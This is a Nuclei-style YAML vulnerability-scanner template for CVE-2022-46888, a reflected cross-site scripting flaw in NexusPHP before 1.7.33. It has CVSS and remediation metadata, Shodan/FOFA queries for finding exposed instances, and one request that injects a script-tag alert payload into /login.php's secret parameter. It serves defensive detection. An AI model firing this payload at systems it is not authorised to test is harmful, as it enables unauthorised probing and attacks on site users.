59 lines
2.2 KiB
YAML
59 lines
2.2 KiB
YAML
id: CVE-2022-46888
|
|
|
|
info:
|
|
name: NexusPHP <1.7.33 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..
|
|
remediation: |
|
|
Upgrade to NexusPHP version 1.7.33 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities
|
|
- https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-46888
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-46888
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00143
|
|
epss-percentile: 0.50061
|
|
cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: nexusphp
|
|
product: nexusphp
|
|
shodan-query:
|
|
- http.favicon.hash:-582931176
|
|
- cpe:"cpe:2.3:a:nexusphp:nexusphp"
|
|
fofa-query: icon_hash=-582931176
|
|
tags: cve,cve2022,nexus,php,nexusphp,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/login.php?secret="><script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'value=""><script>alert(document.domain)</script>">'
|
|
- 'NexusPHP'
|
|
case-insensitive: true
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502207cb83e87b3cb11b3eb8d23b3be72e70b9dde5d94d8752b76dcfc88f7291d5b4e022100c79cd09153de2c935fc3523561954939d7a907225c7bc149a8ea586ed9b8a553:922c64590222798bb761d5b6d8e72950 |